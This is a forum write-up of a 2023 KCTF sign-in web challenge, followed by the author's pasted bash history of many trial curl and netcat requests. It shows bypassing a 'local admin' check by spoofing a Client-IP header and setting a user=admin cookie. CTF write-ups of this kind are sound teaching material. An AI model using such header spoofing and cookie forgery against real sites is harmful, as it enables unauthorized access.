首页
社区
课程
招聘
[原创] 看雪 2023 KCTF 年度赛 签到题 生死较量
发表于: 2023-9-1 13:42 1141

[原创] 看雪 2023 KCTF 年度赛 签到题 生死较量

2023-9-1 13:42
1141

页面提示的两个关键点:“本地” “管理员”

“本地”:用 'Client-IP: 127.0.0.1' http头 绕过
“管理员”:服务器响应有'Set-Cookie: user=guest',所以本地传一个 'Cookie: user=admin'

最终答案:

1
curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'

以上wp针对懂web的人
.
附不懂web的人一个半小时的挣扎:(来自.bash_history)
(简直是有史以来做过的最难的签到题目)
.
历程:
cookie很容易发现,F12就能看到
(然后卡了若干分钟,此时前三血都出了)
注意到"本地",用极其有限的web题经验,想到X-Fowarded-For,试了无效
(继续卡十几分钟)
查到绕本地的http头很多,挨个试
(试到Clint-IP,响应终于有变化,但为什么还提示不是admin呢)
自闭
(走偏,看到php/5.5.9版本太低,开始疯狂试验 "PHP Development Server <= 7.4.21 - Remote Source Disclosure" )
404,原来1小时到了靶机自动关闭了。重启继续(显然,后面的host都变了)
(看到响应apache,知道无用)
……
.
看下面的最后两条命令,'Cookie: ...'前面漏了'-H',所以才会提示不是admin
.
..
...
结束,太心酸了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>; user=admin'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=root' '
curl -vvv -H 'Cookie: user=administrator' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: localhost' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,localhost' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For-Original: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-Host: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Remote-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-True-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=root' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user="' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;password=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=Administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=localadmin' '
curl -vvv -H 'Client-IP: 127.0.0.1' '
curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl '  -H 'Client-IP: 127.0.0.1'  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
echo -ne 'GET / HTTP/1.1\r\nHost: /f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'

[注意]看雪招聘,专注安全领域的专业人才平台!

最后于 2023-9-1 13:49 被mb_mgodlfyn编辑 ,原因:
收藏
免费
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册